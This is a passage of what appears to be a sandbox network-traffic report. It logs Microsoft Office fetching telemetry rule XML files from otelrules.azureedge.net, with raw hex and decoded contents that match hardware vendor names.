                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            32192.168.2.54974413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:25 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                            x-ms-request-id: 57f8276b-001e-000b-7658-2e15a7000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133925Z-17df447cdb5t94hvhC1DFWw97800000002wg00000000fkwt
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            33192.168.2.54974313.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:24 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:25 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                            x-ms-request-id: 75035ba1-b01e-005c-42fb-2c4c66000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133925Z-16547b76f7fkj7j4hC1DFW0a9g00000006q0000000008pb2
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            34192.168.2.54974513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:25 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 428
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                            x-ms-request-id: 2398beba-501e-007b-298e-2d5ba2000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133925Z-15869dbbcc6lq45jhC1DFW7zwg000000077g000000002nh1
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            35192.168.2.54974613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:25 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                            x-ms-request-id: 6b3fdf92-c01e-008e-384a-2e7381000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133925Z-15869dbbcc6qwghvhC1DFWssds000000030g000000007xrx
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            36192.168.2.54974913.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:25 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                            x-ms-request-id: d92822fd-901e-0048-0b55-2eb800000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133925Z-17df447cdb5lrwcchC1DFWphes00000002y0000000006rum
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            37192.168.2.54974713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:25 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                            x-ms-request-id: 4785079e-601e-0070-2a8e-2da0c9000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133925Z-15869dbbcc6lq2lzhC1DFWym6c00000001q000000000d6np
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            38192.168.2.54974813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:25 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:25 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 499
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                            x-ms-request-id: 3dd2fc16-001e-0028-2c0b-2fc49f000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133925Z-17df447cdb57g7m7hC1DFW791s00000002wg0000000060sd
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:26 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            39192.168.2.54975013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:27 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                            x-ms-request-id: 2361c5fe-901e-0064-45f6-2ce8a6000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133927Z-16547b76f7fr28cchC1DFWnuws00000006r000000000g6b4
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            40192.168.2.54975413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:27 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                            x-ms-request-id: e92242f2-701e-005c-7858-2ebb94000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133927Z-17df447cdb5fzdpxhC1DFWdd3400000002r000000000h5zv
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            41192.168.2.54975213.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:27 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                            x-ms-request-id: 99f7ed0d-701e-0050-604a-2f6767000000
